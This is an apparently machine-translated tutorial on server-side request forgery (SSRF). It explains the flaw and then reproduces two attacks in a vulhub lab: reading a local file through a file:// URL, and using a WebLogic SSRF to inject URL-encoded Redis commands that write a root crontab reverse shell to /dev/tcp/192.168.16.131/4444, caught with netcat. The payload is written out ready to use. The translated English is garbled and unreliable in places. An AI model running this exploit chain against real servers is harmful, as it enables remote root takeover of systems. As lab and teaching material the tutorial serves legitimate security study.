Vulnerabilities introduced
SSRF vulnerabilities: SSRF (Server-Side Request Forgery : server-side request forgery) is a kind of malicious visitors construct url, a security breach by the end of this service that initiated the request url.
Vulnerabilities principle
reason SSRF formed mostly because the server provides the ability to get data from other server applications, and does not do filtering and restrictions on the destination address, such as access to web text content from the specified URL address Load picture specified address, downloads, etc. Wait.
In general, the goal is to SSRF access internal systems from outside the network can not be accessed. (Precisely because it is initiated by the server, so it can request an internal system to which it is connected and isolated from the external network)
loopholes harm
the network 1. The external network server is located, the local port scan, get some services banner information.
2. run attack the internal network or local applications
3. application fingerprinting intranet Web
internal 4. identify information assets enterprise Web application attacks inside and outside the network, primarily using HTTP GET request can be achieved attacks (such as strust2, sQli etc.)
5. read local files using the file protocol
vulnerability of high-risk trigger point
1. Share: Share web content through a URL address
2. transcoding services: the URL address of the original address of the web content tuning its browser for mobile phone screen
3. translator: translating a text content by URL address
4. the images load and download: upload or download pictures via a URL address
5. pictures, articles collections feature
loopholes reproduction
1. the use of loopholes read local ssrf files
principle
the requested page url changed to specify a local file path url
Step
original url:
HTTP:? //Localhost/XXE-master/vul/ssrf/ssrf_curl.php url = HTTP: //127.0.0.1/XXE-master/vul/ssrf/ssrf_info/info1.php
original url implementation of the results :
the revised url
HTTP: //localhost/XXE-master/vul/ssrf/ssrf_curl.php url = File:? /// C: /Users/Administrator/Desktop/1.txt
url implementation of revised results
1.txt is displayed page
2. use within ssrf exploits net redis database
environment
Redis databases version 4.0, 10.0.x version of weblogic server
principle
use weblogic server sends an HTTP request to the vulnerability ssrf Redis database, re-use networks within Redis database version 4.0 unauthorized access vulnerability getshell
step
1. open the Ubuntu virtual machine, install vulhub vulnerabilities environment
2. Go vulhub-master / weblogic / ssrf directory, enter docker-compose up -d startup environment
3. physical machine access http://192.168.16.131 : 7001 / uddiexplorer / SearchPublicRegistries.jsp, 192.168.16.131 as the IP vulhub
4. enter a value Bp capture
5. By modifying the values in the post request url designated IP server, the network probe redis server IP (port 6379 by checking), http: //172.22.0.2: 6379 successful return result
6. redis transmitting three commands, i.e., bomb shell script can be written to / etc / crontab, then send the shell to a designated port of ip, ip can change yourself, then use nc listening on port 4444 192.168.16.131, enter nc -lvvp 4444 open listening
Url encoded redis command:
test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.16.131%2F4444%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa
Sending a command:
the (http://172.22.0.2:6379/ command) the command into the encoded url ip redis server, replace url transmission, after a while the nc will automatically pop up a control 172.22.0.2:6379 the shell
using nc listening on port 4444 open: the pop-up control shell 172.22.0.2:6379
